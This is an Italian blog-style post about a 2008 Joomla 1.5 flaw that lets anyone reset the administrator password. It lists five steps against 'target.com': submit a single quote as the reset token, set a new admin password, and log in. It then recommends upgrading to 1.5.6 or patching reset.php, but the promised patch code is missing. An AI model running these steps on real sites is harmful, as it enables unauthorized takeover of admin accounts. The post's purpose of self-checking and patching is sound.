Vulnerabilità Joomla 1.5 : Reset Password Administrator

workgroupsbugsquadbe8 Vulnerabilità Joomla 1.5 : Reset Password Administrator


Joomla 1.5 ha una vulnerabilità che permette di cambiare la password di administrator in pochi secondi!!!
Per controllare se la vostra versione è bacata provare quanto segue:

1. Go to url : target.com/index.php?option=com_user&view=reset&layout=confirm
2. Write into field token char ‘ and Click OK.
3. Write new password for admin
4. Go to url : target.com/administrator/
5. Login admin with new password




Patch per risolvere la vulnerabilità


L’exploit è stato reso noto il 12/08/08, il giorno successivo il team Jommla ha pubblicato le patch, quindi si consiglia caldamente di aggiornare il proprio sito alla versione 1.5.6 per evitare che qualsiasi lamer o script kiddies vi distrugga tutto.


Se non volete aggiornare tutto il Core, è possibile patchare solamente il file buggato /components/com_user/models/reset.php con questo codice





0